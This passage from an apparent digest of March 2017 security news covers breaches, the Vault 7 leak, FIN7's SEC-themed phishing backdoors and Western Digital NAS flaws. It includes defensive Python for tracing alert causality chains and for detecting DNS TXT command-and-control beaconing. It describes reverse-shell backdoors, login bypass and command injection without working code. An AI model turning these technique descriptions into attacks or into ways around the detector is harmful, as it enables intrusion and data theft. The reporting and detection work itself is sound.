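        while (host, pid) in self.starts and (host, pid) not in seen:
            seen.add((host, pid))
            _, ts, _, ppid, image, _, detail = self.starts[(host, pid)]
            chain.append((host, pid, image))
            if detail.startswith("remote from "):
                src = detail[len("remote from "):]
                hops = [l for l in self.logons[src] if l[6] == host and l[1] <= ts]
                if not hops:
                    break           # no recorded logon explains the remote start
                host, pid = src, hops[-1][2]
            else:
                pid = ppid
        return chain

    def explain_alert(self, host, pid, indicator):
        """Return the alert's full context: chain, root cause, hosts, actions, verdict."""
        chain = self.causality_chain(host, pid)
        procs = [(h, p) for h, p, _ in chain]
        actions = [(h, ev[5], ev[6]) for h, p in procs
                   for ev in self.by_proc[(h, p)] if ev[5] != "start"]
        dropped_exe = any(kind == "write" and d.lower().endswith(".exe")
                          for _, kind, d in actions)
        hosts = sorted({h for h, _, _ in chain})
        # Root cause: the oldest process in the chain that opened a document.
        root_cause = f"{chain[-1][2]} on {chain[-1][0]}"
        for h, p, image in reversed(chain):
            d = self.starts[(h, p)][6]
            if d and not d.startswith("remote from "):
                root_cause = f"{image} opened {d} on {h}"
                break
        # Assumed heuristic: a dropped executable or a cross-host hop is worth
        # an analyst's time; a single-host chain with neither is likely noise.
        verdict = "investigate" if dropped_exe or len(hosts) > 1 else "likely false positive"
        return {"indicator": indicator, "chain": [f"{h}:{img}" for h, _, img in chain],
                "root_cause": root_cause, "hosts": hosts,
                "actions": actions, "verdict": verdict}


if __name__ == "__main__":
    t = Telemetry(EVENTS)
    for h, p, ind in [("boss-pc", 500, "www.ohnodontgothere.ua"),
                      ("hr-pc", 700, "www.youshouldnotgothere.ru")]:
        print(t.explain_alert(h, p, ind))
```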
Responder
So, what do you do once you have found an actual cyber breach that requires a firm and accurate response?
Before Secdo, IT personnel usually had to confiscate your computer, wipe it clean and reinstall Windows and all your applications and data files. Everything. This could take hours or even days. What an interruption to your productivity and what a cost to the company!
With Secdo, the process is a lot faster and smarter, and doesn't interfere with your work. Responder gives security and IT people the ability to remotely access and surgically resolve any threat on any host without impacting productivity.
Responder provides numerous powerful containment and remediation capabilities including patented ICEBlock™ that safely freezes a process in memory while the endpoint remains on the network. You can keep working securely while all this takes place.

Responder enables IT to deal with specific threats on any host without impacting user productivity
Responder even takes security a step further. Its plentiful and powerful response capabilities can be fully automated, adding protection to the organization into the future.
Conclusion
Digital data is an attractive target for cyber attackers who would steal it for nefarious purposes. Organizations employ security analysts and deploy numerous security products to help them defend against cyber attacks.
These products may generate thousands of alerts every day, and most of these are false positives. Due to the overwhelming daily volume, security teams cannot deal with all alerts and must triage them.
Analysts need an automatic, accurate way to separate out the false positives and prioritize the real ones so that they can focus on real threats. They need to see the entire scope of incidents in order to determine the proper course of remediation. They require remote, surgical response tools that enable them to accurately eradicate threats while maintaining business productivity.
Secdo's Preemptive Incident Response (PIR) transforms the traditional IR process from reactive to proactive by continuously collecting and storing all host activity data – BEFORE an incident occurs.
All activity data from all endpoints and servers (hosts) is automatically correlated in causality chains (context) in anticipation of future incidents. As alerts are ingested from detection systems, they are connected with their appropriate causality chains, preparing full forensic evidence even before Incident Response teams get involved.
With full context, false positives can be eliminated accurately, and real alerts can be prioritized correctly. Security analysts can quickly investigate each alert, already observing its root cause, full activity, entities involved and damage assessment.
With this level of visibility and context, accompanied by a suite of advanced surgical remediation tools, analysts can respond remotely, promptly and precisely to threats while maintaining business productivity.


Verifone Investigating 'Limited Cyber Intrusion'

8.3.2017 securityweek Cyber
Verifone is investigating a breach that it has described as "a limited cyber intrusion" into its corporate network. It believes "that due to our immediate response, the potential for misuse of information is limited."

KrebsOnSecurity has published an internal memo dated Jan. 23 sent to all Verifone staff and contractors. It says the payment solutions firm is currently investigating an IT control matter, and asks everyone to change their employee passwords within 24 hours. It also states that employees will no longer be able to load new software onto their company desktop and laptop computers; that is, local admin privileges are being removed.

These two actions are typical responses to an actual or likely breach -- although many security professionals will be surprised that staff still had local admin status. The memo was sent by Steve Horan, Verifone's CIO, rather than CISO David Galas. At this time, the Krebs report is the sole source of information on the breach.

A Verifone spokesperson told Krebs, "In January 2017, Verifone's information security team saw evidence of a limited cyber intrusion into our corporate network. Our payment services network was not impacted. We immediately began work to determine the type of information targeted and executed appropriate measures in response. We believe today that due to our immediate response, the potential for misuse of information is limited." At that time he declined to give any further information.

However, a 'source' told Krebs that the internal memo was in response to warnings from Visa and Mastercard. Historically, many breaches are discovered not by organizations themselves, but by banks and financial institutions detecting suspect patterns in account usage. If this is what happened, and the 'limited incursion' is related to the Visa and Mastercard alerts, then the implication is that the breach was more extensive than Verifone is currently claiming.

However, Krebs' source (who seems to have deep inside knowledge of the breach) goes further, claiming that Mastercard and Visa suggested that "the intruders appeared to have been inside of Verifone's network since mid-2016." He also told Krebs "there is ample evidence the attackers used some of the same toolsets and infrastructure as the cybercrime gang that last year is thought to have hacked into Oracle's MICROS division."

If this is true, although it cannot currently be verified, then the finger points at the gang usually known as Carbanak or Anunak. In February 2015, Kaspersky Lab described this gang as a group of cybercriminals from Russia, Ukraine and other parts of Europe and China.

Given that the Verifone memo locks down endpoints and changes passwords, it seems likely that the initial intrusion has been traced to an employee device. Statistically, it would be a reasonable assumption that someone fell for a phishing attack and installed malware; but that is just another assumption at this point. However, if Krebs' source is correct, then the attackers had been inside Verifone for at least six months before this remedial action was taken.

Six months gives attackers ample time to perform lateral movement. This would be hindered by effective network segmentation within Verifone. It seems that this might be the case. The Verifone spokesperson described it as a limited incursion. Krebs' source only mentions one affected area of Verifone: "A customer support unit based in Clearwater, Fla. that provides comprehensive payment solutions specifically to gas and petrol stations throughout the United States - including, pay-at-the-pump credit card processing; physical cash registers inside the fuel station store; customer loyalty programs; and remote technical support."

This now seems to have been confirmed by Verifone. Following Krebs' initial report it issued an update to its original statement. "According to the forensic information to-date, the cyber attempt was limited to controllers at approximately two dozen gas stations, and occurred over a short time frame. We believe that no other merchants were targeted and the integrity of our networks and merchants' payment terminals remain secure and fully operational."

On the surface, it appears that Verifone has indeed experienced a breach, but the effects were limited and have been contained. Nevertheless, we will need to await further developments before this is independently confirmed. Six months remains a lengthy period to have attackers as advanced and experienced as Carbanak inside your networks; and it remains a possibility that they may have moved laterally to other parts of the Verifone network.


FBI caught a paedophile thanks to its own malware. But it is dropping the charges because it does not want to disclose its methods
8.3.2017 Lupa BigBrother
Gathering evidence in cybercrime cases sometimes goes further than the courts might like.
Last year the US FBI managed to detect the IP addresses of people who used the Tor network to visit child pornography sites, specifically Playpen. On the basis of this discovery, charges were filed in US courts. That could have been the end of the story, but the trial complicates the situation somewhat.

One of the defendants, Jay Michaud, requested that all details of how the FBI got to him be disclosed. The court granted his request. That put the FBI in a difficult position: to secure convictions in these cases it would have to disclose exactly what steps it had taken. The FBI and the US Department of Justice ultimately refused to take that step, and prosecutors are dropping the charges.

The FBI had developed its own malware that exploited Tor and was able to trace IP addresses. And if the FBI had to disclose the details, it would presumably also have to reveal exactly how this "network investigative technique" (NIT) works.

Ars Technica covers the case in more detail. There will probably be a lot more debate about it. It could set a precedent that influences other similar investigations.

Unauthorized access
The FBI and other law enforcement agencies use multiple sources of information and procedures in their cyber investigations. "It is completely normal for us to send data to the FBI. In the vast majority of cases it is a one-way channel. We have had only a few cases where the FBI also provided us with data and wanted to help us themselves," Juraj Malcho, Chief Technology Officer of ESET, tells Lupa.


The FBI obtains information and leads from private cybersecurity companies. It then uses these sources to get to, for example, botnet command-and-control (CNC) servers, IP addresses and so on. It continues where the powers of private companies end.

A problem can arise when the FBI obtains evidence in a way that may not be entirely legal. Breaking directly into the problematic servers is still unauthorized access, a form of active hacking. The FBI therefore takes the information from companies and tries to work with it in such a way that forensic experts will have no problem with it later.

Even the cybersecurity companies themselves do not always try to actively get into servers. "We do not actively hack CNC servers. That is on the borderline; it is a kind of unauthorized access," says Malcho. "We are a private company and we have certain limits on what we can do. When we track someone down, we contact the police."

Probing the darknet
But there are companies that are not afraid to go deeper. They have no legislative or moral problem with it. The police also cooperate with such companies.

"If someone broke into a CNC server and obtained compromising material, the kind the FBI is most interested in, typically child porn, it is treated as having been done in good faith. It is also about reputation," Malcho adds.

"Earlier, at a conference, I ran into someone from the FBI who deals with this issue. He said that when we come across child porn we should keep our hands off it immediately, because they are monitoring it and they don't care who we are. If we want to give them a lead, we should send it, but not investigate further."

Companies that go beyond the work of ordinary cybersecurity firms actively try to operate on and gain access to darknet forums, where deals are arranged and access, illegal goods and so on are offered.

Getting in is difficult, though; it often requires a reputation in the cybercriminal community, exchanging information and proving one's activities. "We only move on the surface. It is more a matter of individual research," says ESET's new technical chief. "Monitoring forums takes a considerable amount of time, which is one reason we turn to partners who specialize in this sort of thing. But I don't believe even the partners have contacts that go really deep," he adds.

One can hardly expect the owners or renters of CNC and other servers to complain about the possible illegality of the attacks. They will hardly sue anyone for breaking into a server with illegal content. Server capacity is often rented on the darknet as well. These are specialized services that take advantage of the jurisdictions of countries where nobody cares.


The CIA can break into Linux, TVs, routers and phones, WikiLeaks shows
8.3.2017 Root.cz BigBrother

WikiLeaks has published the first part of documents leaked from the US CIA. According to them, the agency has tools for attacking a whole range of platforms and devices. The affair has a chance of becoming Snowden 2.0.
WikiLeaks has opened the Vault 7 project and released a treasure trove in the form of the first batch of documents leaked from the CIA. The bundle of 8378 documents was published via BitTorrent as an encrypted archive. You can download the torrent file; the password for the 7-Zip archive is:

SplinterItIntoAThousandPiecesAndScatterItIntoTheWinds

The information was originally to be released in an online press conference hosted by Julian Assange. It turned out, however, that his Facebook and Periscope accounts were under attack. The archive password was therefore disclosed earlier so that the documents being published would not be endangered.

WikiLeaks (@wikileaks), 2:03 PM - 7 Mar 2017:
Press conf under attack: Facebook+Periscope video used by WikiLeaks' editor Julian Assange have been attacked. Activating contingency (1/2)
The documents show the software weapons the CIA is able to deploy against a wide range of platforms and technologies. The agency has exploits for iPhone, Android, Windows, Linux, MikroTik, Solaris, macOS and even some Samsung TVs. On the TVs, the microphone can be switched on remotely and used to eavesdrop on the surroundings.

WikiLeaks describes how the department officially named the Center for Cyber Intelligence (CCI) produces thousands of attack tools for all sorts of purposes. This extraordinary collection, which amounts to hundreds of millions of lines of code, gives its possessor the entire hacking capacity of the CIA, the site writes in its press release.

Information about the database was announced in advance on Twitter; after the organization found it was under attack, it switched to plan B and published the details earlier.

WikiLeaks (@wikileaks), 2:06 PM - 7 Mar 2017: "RELEASE: CIA Vault 7 Year Zero decryption passphrase: SplinterItIntoAThousandPiecesAndScatterItIntoTheWinds"
It is no surprise that WikiLeaks has laid into the CIA. By all appearances it is an organisation with great power and little oversight. The CIA's hackers have written more code than Facebook needs to run. The CIA has thus effectively created 'its own NSA' with even less accountability, and with no answer to the question of why an enormous budget is being spent on duplicating the capabilities of a rival agency.

The organisation promises to check all documents thoroughly so as not to publish "loaded weapons". Some information has also been anonymised. Edward Snowden commented on the matter on his Twitter and, in his words, the documents look credible: the names used in the texts are real and are known only to insiders.

Edward Snowden (@Snowden), 5:53 PM - 7 Mar 2017: "Still working through the publication, but what @Wikileaks has here is genuinely a big deal. Looks authentic."
Among other things, the documents show that the CIA cooperated with the British MI5 on the Weeping Angel project, which targeted Samsung TVs whose microphone can be controlled remotely. The organisations also managed to gain control of modern cars and trucks. There is a special department focused on gaining access to and controlling iPhone and iPad mobile devices. Together with zero-day exploits for Android, this allows the CIA to bypass the encryption of WhatsApp, Signal, Telegram, Weibo, Confide and Cloackman by hacking "smart" phones and collecting audio and messages before they are encrypted. The encryption algorithms themselves are therefore not compromised, and naming a specific "broken" application is misleading, as people from Telegram point out.

Analysis of the documents pointed to other interesting capabilities concerning mobile phones. On some devices (the Samsung Galaxy S2 was named) the chipset can be switched into monitor mode to sniff traffic on nearby Wi-Fi networks. This capability is normally blocked in the firmware, but the CIA managed to bypass the protection through reverse engineering, so Broadcom probably did not help directly. It is also interesting that the exploit gets onto the phone through the Apollo music player. It is unclear whether this was the intention of its author (who worked for a "government research laboratory") or yet another abuse of a bug in the application.

The documents also include, for example, a guide to modifying Windows 8 installation images so that the requirement to enter an installation key can be bypassed. After the modification (which, judging by the commands, is done in Linux) a "Skip" button appears in the installation dialog.

Pieces of code taken from malware circulating freely on the Internet are used in the development of the attack tools. Likewise, some techniques were stolen from rival organisations such as the British GCHQ and the American NSA. Developers have tools for building attack malware for specific situations. They are reportedly expected to focus on small, well-targeted "solutions" rather than on large tools with many functions.

Other revelations include that the US consulate in Frankfurt is in fact a covert base for CIA hackers, who cover Europe, the Middle East and Africa from there.

Also interesting is how the CIA protected itself against prosecution: it did not classify its attack systems as secret. Otherwise it could not have used the code on the Internet, that is, uploaded it to other people's computers and devices, because there are laws preventing such public use of classified tools and information. According to WikiLeaks, the government also has no right to enforce copyright here, as the Constitution of the United States of America prevents it. This means that anyone can redistribute such unclassified material without fear of prosecution.

Further information will certainly surface gradually; part of the documents has already been studied, but most have not. The Internet community has already started reading, and we will have to wait for further results.


Austrian ministry server attacked again by Turkish hackers

8.3.2017 Novinky/Bezpečnost BigBrother
The server of the Austrian foreign ministry was attacked again on Monday by Turkish hackers. The daily Die Presse reported this on Wednesday, citing a ministry spokesman. The ministry's website was unavailable for several minutes because of the attack, but according to the ministry no data was leaked.
It is the third such incident since last November, ministry spokesman Thomas Schnöll said. He added that minister Sebastian Kurz would not let the attacks deter him from his policy towards Turkey.

Relations between Vienna and Ankara have long been tense. Hundreds of thousands of Turks live in Austria, many of them with dual citizenship. Ankara's representatives are seeking support among them for the proposed constitutional changes that would significantly strengthen the powers of Turkish president Recep Tayyip Erdogan.

In connection with these changes, Ankara has called a referendum for April. The Austrian government has demanded a freeze of the accession talks between the European Union and Turkey, and Kurz said on Monday that he expects Turkish politicians not to appear in Austria to campaign in the Turkish pre-election contest.

In recent months an airport, ministries, the central bank and the parliament have been targeted by hackers in Austria. An anonymous Turkish group claimed responsibility for the attacks, citing Austria's behaviour "hostile to Turkey" as its motive. At the end of February the paper Der Kurier wrote that, according to Austrian intelligence, a Turkish nationalist living in the USA is behind the attacks on the servers.


WikiLeaks has published alleged CIA documents describing hacking operations
8.3.2017 Živě.cz

After a few months the WikiLeaks group has made itself loudly heard again, releasing documents that allegedly describe a wide range of cyber operations by the US CIA, including intrusions into mobile operating systems, Windows and smart TVs, as well as the use of various eavesdropping USB devices and keyloggers.

If the documents are genuine, this will probably be a data leak at least as serious as the one involving the NSA and Edward Snowden. In this case, however, the WikiLeaks presentation looks somewhat different. Instead of PowerPoint presentations, these are more like detailed procedures resembling a kind of Wikipedia for covert operations. The WikiLeaks editors have also anonymised names and some other sensitive and specific details about the operations.

In any case, a cursory look at the published documents, if they are genuine, suggests that they describe basic procedures for cyber attacks and penetration tests that differ from those described in the documentation of the Kali Linux security distribution mainly in having exotic names such as SnowOwl, HarpyEagle or GreenPaket.

You can read here both about intrusions using various tools reminiscent of Metasploit, well known among hackers, and similar ones, and about the abuse of root on the Android platform, for example.

The CIA itself does not comment on such leaks, so the current affair will require thorough analysis.


Cybercriminals Target Employees Involved in SEC Filings

8.3.2017 securityweek Cyber

A cybercrime group tracked by FireEye as FIN7 has been observed targeting nearly a dozen organizations in the United States, focusing on personnel who handle filings to the Securities and Exchange Commission (SEC).

The attack starts with a spear phishing email coming from a spoofed sec.gov email address, which carries a document apparently containing “important” information. Once the document is opened, a VBS script installs a new PowerShell backdoor dubbed POWERSOURCE.

POWERSOURCE has also been used to download a second-stage PowerShell backdoor named TEXTMATE, which provides a reverse shell to the attacker. POWERSOURCE is an obfuscated and modified version of the publicly available DNS_TXT_Pwnage tool, while TEXTMATE is a fileless malware. Both rely on DNS TXT requests for command and control (C&C) communications.
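Both backdoors above carry their C&C traffic in DNS TXT lookups, so one defender-side check is to look for a client that issues many TXT queries for unique, high-entropy subdomains of one parent domain. The following detector is an added example written for this page, not FireEye's code; the resolver log format, the sample lines and the `c2-example.test` domain are constructed, and the parent-domain split (last two labels) is a simplification a real deployment would replace with the public suffix list.

```python
"""Heuristic detector for DNS TXT based command-and-control beaconing (added example)."""
import math
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed resolver log: "<timestamp> <client_ip> <qtype> <qname>".
# 10.1.2.30 beacons to a constructed C&C domain with one-off hex-like labels;
# 10.1.2.31 performs ordinary DMARC/TXT lookups that repeat the same name.
SAMPLE_LOG = """\
2017-03-08T10:00:01 10.1.2.30 A www.example.com
2017-03-08T10:00:02 10.1.2.30 TXT 0123456789ab.c2-example.test
2017-03-08T10:00:32 10.1.2.30 TXT bcdef0123456.c2-example.test
2017-03-08T10:01:02 10.1.2.30 TXT a1b2c3d4e5f6.c2-example.test
2017-03-08T10:01:32 10.1.2.30 TXT fedcba987654.c2-example.test
2017-03-08T10:02:02 10.1.2.30 TXT 13579bdf0246.c2-example.test
2017-03-08T10:02:32 10.1.2.30 TXT 2468ace13579.c2-example.test
2017-03-08T10:00:05 10.1.2.31 TXT _dmarc.example.com
2017-03-08T10:00:06 10.1.2.31 TXT _dmarc.example.com
2017-03-08T10:00:07 10.1.2.31 TXT _dmarc.example.com
2017-03-08T10:00:08 10.1.2.31 TXT _dmarc.example.com
2017-03-08T10:00:09 10.1.2.31 TXT _dmarc.example.com
2017-03-08T10:00:10 10.1.2.31 TXT example.com
"""

LOG_RE = re.compile(r"^(\S+)\s+(\d+\.\d+\.\d+\.\d+)\s+([A-Z]+)\s+(\S+)$")


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; encoded C&C labels score high, words score low."""
    if not s:
        return 0.0
    counts: Dict[str, int] = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str) -> Tuple[str, str]:
    """Return (subdomain, parent_domain); parent = last two labels (simplification)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def parse_log(text: str) -> List[Tuple[str, str, str, str]]:
    """Parse the constructed log format, silently skipping malformed lines."""
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            records.append(m.groups())
    return records


def find_txt_beacons(text: str, min_queries: int = 5,
                     min_unique_ratio: float = 0.8,
                     min_entropy: float = 3.0) -> List[dict]:
    """Flag (client, parent domain) pairs whose TXT queries look like a data channel:
    enough of them, almost every subdomain distinct, and labels with high entropy."""
    stats = defaultdict(lambda: {"count": 0, "subs": set(), "entropy_sum": 0.0})
    for _ts, client, qtype, qname in parse_log(text):
        if qtype != "TXT":
            continue
        sub, parent = split_name(qname)
        st = stats[(client, parent)]
        st["count"] += 1
        st["subs"].add(sub)
        st["entropy_sum"] += shannon_entropy(sub.replace(".", ""))

    alerts = []
    for (client, domain), st in stats.items():
        n = st["count"]
        if n < min_queries:
            continue
        unique_ratio = len(st["subs"]) / n
        mean_entropy = st["entropy_sum"] / n
        if unique_ratio >= min_unique_ratio and mean_entropy >= min_entropy:
            alerts.append({"client": client, "domain": domain, "txt_queries": n,
                           "unique_ratio": round(unique_ratio, 2),
                           "mean_entropy": round(mean_entropy, 3)})
    return sorted(alerts, key=lambda a: (-a["txt_queries"], a["client"]))


if __name__ == "__main__":
    for alert in find_txt_beacons(SAMPLE_LOG):
        print(alert)
```

Tune the thresholds to the resolver's baseline: DKIM, DMARC and SPF lookups repeat the same names, which the unique-subdomain ratio filters out.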

POWERSOURCE has also been spotted delivering Cobalt Strike’s Beacon post-exploitation tool, which had been used in previous FIN7 operations as well. FireEye noted that the domain serving the Beacon payload had also hosted a Carbanak backdoor sample compiled in February 2017. FIN7 has been known to rely heavily on Carbanak malware.

FireEye has identified 11 targets in the financial services, transportation, education, retail, IT services, and electronics sectors. While the SEC-themed spear-phishing campaign focuses on organizations in the United States, experts believe it is possible that the cybercriminals have launched similar operations in other countries, leveraging the names of their respective regulators.

The security firm said its products and services blocked these attacks in their early stages, which prevented researchers from determining what the attackers were after.

“If the attackers are attempting to compromise persons involved in SEC filings due to their information access, they may ultimately be pursuing securities fraud or other investment abuse,” FireEye researchers said in a blog post. “Alternatively, if they are tailoring their social engineering to these individuals, but have other goals once they have established a foothold, they may intend to pursue one of many other fraud types.”

In previous attacks, FIN7 used various point-of-sale (PoS) malware families to steal sensitive financial information from targeted organizations. The Carbanak malware used by the group is known for its role in campaigns that involved fraudulent bank transactions and ATM attacks.


UK's 1E Challenges Tanium With New Endpoint Detection & Response (EDR) Tool

8.3.2017 securityweek Security


Tachyon Takes on Tanium With Promise to Go From Detection to Remediation Across the Entire IT Estate in Seconds

Time to detect and time to remediate is the difference between an incident and data loss. But while there have been dozens of new products designed to help the security team detect incidents, there has been very little that helps IT Ops remediate rapidly across the entire estate.

One of the problems is that detection and remediation are separate operations often handled by separate teams: security and IT. But security is not IT's only customer -- it must also respond to compliance, audit, and virtually every operational department in the organization with requests for enhancements or completely new apps.

The result is a huge workload made more difficult by the false positives that come from many of today's threat detection systems. According to 1E's own research involving 1000 IT professionals, more than half spend 25% of their time responding to unplanned incidents coming from urgent security updates, configuration changes and software audits.

Today 1E has launched Tachyon, designed to give IT operations instant actionable access into the furthest reaches of the entire IT estate (up to 1.5 million endpoints), regardless of distribution or operating system. Agents on every endpoint, whether server, desktop, mobile or IoT device can be queried from the Tachyon server. Incidents can be isolated and remedial action taken -- within seconds across the entire estate.

Stuart Okin, SVP of product at 1E, told SecurityWeek to think of Tachyon's front end as 'a Google for the IT estate'. Questions can be asked and replies drawn from every endpoint in seconds. Based on those answers, remedial action can be taken -- again within seconds.

Okin gave an example involving abuse of Java. Assume that the security team has learned that a Java vulnerability is being exploited, and has passed this information to IT Ops. A single question to Tachyon asking for device software filtered by Java displays all devices at risk. A second question looks for historical evidence of connection to the attacker's IP address. Within seconds, all (if any) compromised devices have been located.

Further communication with the attacker can be blocked instantly by instructing Tachyon to add a new rule to the local firewall blocking that IP address. Repeating the process will now confirm that no devices can connect to the attacker.

This principle applies across the board. If the security team learns of a current threat or detects indications of compromise through other threat intelligence systems, and can define the threat, the IT team can use Tachyon to locate and remediate within seconds. Of course, it needn't be a security threat -- it could be a threat to regulatory status, or a requirement from audit. It could be used, for example, to locate privileged accounts with access to sensitive data and to remove any that are not strictly necessary. Confirmation with precise details on the remaining privileged accounts can be sent to audit as necessary.

Okin stressed that Tachyon is not designed to replace any existing investments, but to work with them to enhance their performance. Microsoft SCCM is an example. "While other vendors are promoting a rip-and-replace approach, we built Tachyon from the ground up to layer on top of Microsoft SCCM, with a light footprint that enables speed and responsiveness," commented Sumir Karayi, founder and CEO of 1E.

This was confirmed by a Fortune 500 health insurance company, which was one of the first users of Tachyon. "We rely heavily on Microsoft SCCM and other 1E solutions to automate everyday IT tasks such as software updates, but lacked the ability to identify and remediate severe problems instantly," said the organization's infrastructure engineer manager. "1E's Tachyon adds those real-time capabilities - helping us 'save the day' in an emergency. With Tachyon, we can now address big problems in seconds rather than hours, in an organized, controlled way."

Key to Tachyon's workings are agents on each endpoint. These query the device and maintain a secure communication channel with the Tachyon server. They provide the functionality for remedial steps, and keep the system extensible by allowing additional functionality to be introduced without any upgrade to the core system. The agent is designed to be cross-platform, supporting Microsoft, Mac, Linux, mobile and IoT -- making it suitable for large corporations and the emerging internet of things.

The strength of the Tachyon approach is that it doesn't replace anything, nor does it attempt to automate decision making. Indeed, where remedial action can be described as an 'impactful change', a second approval can be required before the remediation is actioned. It makes existing systems work more efficiently and very much faster. Organizations will still need threat analysts to recognize possible incidents; and IT Ops to effect remediation where necessary. Tachyon allows the two teams to work together far more effectively, so that a potential incident can go to detection and remediation in seconds rather than hours or days.


Google Patches 35 Critical Android Vulnerabilities

8.3.2017 securityweek Vulnerability
Google this week released a new set of monthly security patches for Android to address over 100 vulnerabilities in the platform, 35 of which carry a Critical severity rating.

In a newly published Security Bulletin, Google reveals that two partial security patch level strings are rolling out this month: the 2017-03-01 security patch level to resolve 36 vulnerabilities (11 Critical, 15 High, 9 Moderate, 1 Low), and the 2017-03-05 security patch level to address 71 flaws (24 Critical, 32 High, 14 Moderate, 1 Low).

The 11 Critical flaws resolved with the 2017-03-01 security patch level include nine Remote Code Execution (RCE) issues in Mediaserver; one RCE in OpenSSL & BoringSSL; and an Elevation of privilege (EoP) vulnerability in recovery verifier.

The 15 vulnerabilities rated High included three RCE bugs in AOSP Messaging, libgdx, and Framesequence library; two EoP issues in Audioserver; one EoP in NFC; and nine Denial of Service (DoS) vulnerabilities in Mediaserver.

The Medium risk flaws include EoP issues in Location Manager, Wi-Fi, Package Manager, and System UI; Information disclosure vulnerabilities in AOSP Messaging and Mediaserver; and DoS bugs in Setup Wizard and Mediaserver. The Low severity issue addressed in 2017-03-01 security patch level is a DoS vulnerability in Audioserver.

The 24 Critical risk issues resolved in the 2017-03-05 security patch level include 19 EoP vulnerabilities (seven in MediaTek components, five in NVIDIA GPU driver, two in kernel ION subsystem, one in Broadcom Wi-Fi driver, one in kernel FIQ debugger, one in Qualcomm GPU driver, and two in kernel networking subsystem) and five various vulnerabilities in Qualcomm components.

Elevation of privilege issues clearly dominated the patch level, given that 25 rated High severity were addressed as well. They affected kernel networking subsystem, Qualcomm input hardware driver, MediaTek Hardware Sensor Driver, Qualcomm ADSPRPC driver, Qualcomm fingerprint sensor driver, Qualcomm crypto engine driver, Qualcomm camera driver, MediaTek APK, Qualcomm Wi-Fi driver, Synaptics touchscreen driver, Qualcomm IPA driver, HTC Sensor Hub Driver, NVIDIA GPU driver, Qualcomm networking driver, kernel security subsystem, and Qualcomm SPCom driver.

Six of the remaining High risk issues addressed in 2017-03-05 security patch level are Information disclosure vulnerabilities (affecting kernel networking subsystem, MediaTek driver, Qualcomm bootloader, Qualcomm power driver, NVIDIA GPU driver), while the last one is a Denial of service vulnerability in kernel cryptographic subsystem.

The Moderate risk flaws addressed in this patch level include an EoP in Qualcomm camera driver (device specific), and 13 Information disclosure bugs (in Qualcomm Wi-Fi driver, MediaTek video codec driver, Qualcomm video driver, Qualcomm camera driver, HTC sound codec driver, Synaptics touchscreen driver, and kernel USB gadget driver). The Low severity bug was an Information disclosure vulnerability in Qualcomm camera driver.

All of the above issues should be addressed by security patch levels of 2017-03-05 or later, Google notes on its advisory. The company already started pushing an over-the-air update to Google Devices (Android One, Nexus, and Pixel devices) with the March 05, 2017 security patch level.


Bechtel Opens Industrial Cyber Security Lab

8.3.2017 securityweek ICS
Global engineering and construction giant Bechtel has opened a new cyber security lab aimed at protecting industrial equipment and software that control facilities such as power plants, chemical plants, and other large-scale critical infrastructure operations.

With the goal of protecting industrial control systems (ICS) and supervisory control and data acquisition (SCADA) systems from cyber threats, Bechtel says the lab will leverage its experience designing and implementing National Institute of Standards and Technology Risk Management Framework (NIST-RMF) solutions for its government customers.

"The ability to access and control these systems over the Internet, while increasing efficiency, has also exposed some vulnerabilities. There is a dark side to the Internet of Things," said Chad Hartman, program director in Bechtel's government services business. "By using innovative solutions, this lab will give us the ability to test and secure critical systems in a safe environment, which translates into more secure, and resilient equipment for our customers."

Bechtel also announced that it has entered into a research arrangement with George Mason University to provide Mason students with access to the lab.

"These partnerships are critical for universities and for companies," said Robert Osgood, director of Mason's Computer Forensics program and a former FBI supervisory special agent in cyber-crime and counterterrorism. "The laboratory will provide research and internship opportunities for our students and open up a potential talent pipeline for Bechtel in a rapidly growing field."

"Whether we are talking about control systems or telecommunications infrastructure, there is a real need to develop innovative solutions that address the current world environment,” said Patrick Fredericks, program manager for the Strategic Infrastructure Group (SIG) for Bechtel. “The merging of technology in both of these areas requires a new approach that supports global deployment of integrated technology solutions on a large scale, while also addressing the threats that we see now and in the future."

Founded in 1898, Bechtel operates through four global businesses: Infrastructure; Nuclear, Security & Environmental; Oil, Gas & Chemicals; and Mining & Metals.


Serious flaws in Western Digital My Cloud NAS devices allow attackers to fully control them
8.3.2017 securityaffairs Vulnerability

Researchers discovered serious issues in Western Digital My Cloud NAS that can be exploited by attackers to gain root control of the affected devices.
Owners of Western Digital network-attached storage were warned that critical flaws in the My Cloud line of NAS boxes could be exploited by remote attackers to gain remote control of the affected devices.

The attackers can combine the flaws to steal sensitive data or to exploit flawed devices in lateral movements.

“By combining the vulnerabilities documented in this advisory an attacker can fully compromise a WD My Cloud device. In the worst case one could steal sensitive data stored on the device or use it as a jump host for further internal attacks.”

“SEC Consult recommends not to attach WD My Cloud to the network until a thorough security review has been performed by security professionals and all identified issues have been resolved.” reads the advisory published by SCVL.

The affected products are Western Digital My Cloud NAS devices, including the DL4100, EX4, EX2 Ultra and PR2100. The full list of flawed devices is available online.

Attackers can trigger the flaws to bypass logins, inject commands, upload files without permission, and gain control of the boxes.

“This is a serious vulnerability, as the chances for the device to be fully compromised is very high,” explained the SEC Consult Vulnerability Lab (SCVL).

The flaws were reported by SCVL experts to Western Digital on Jan. 18, 2016 and publicly disclosed on March 7, 2017. Another group of experts, from the security firm Exploitee.rs, also discovered the vulnerabilities and disclosed them publicly.

The flaws discovered by the experts include command injection vulnerabilities, a stack-based buffer overflow bug, and a cross-site request forgery flaw. As anticipated, by combining the cross-site request forgery issue with a command injection vulnerability an attacker can gain root access on the affected device and fully compromise it.

“The (cross-site request forgery flaw) can be combined with a command injection vulnerability to gain complete control (root access) of the affected device,” explained the advisory issued by the SCVL.

As of this writing, Western Digital has not provided any information regarding the vulnerabilities or supplied software updates to fix the reported bugs.


According to the researchers at Exploitee.rs, in December the expert Steve Campbell discovered two command injection flaws in Western Digital My Cloud NAS (CVE-2016-10107 and CVE-2016-10108) that were patched by the company the same month; according to Exploitee.rs, however, the patches did not fix the problems and introduced a new login bypass vulnerability.

The Exploitee.rs researcher Zenofex, who analyzed the login bypass issue, found an incorrect implementation of the user authentication mechanism when Secure Shell (SSH) access was enabled. The login check relies on cookies, which an attacker can craft to bypass the login process.

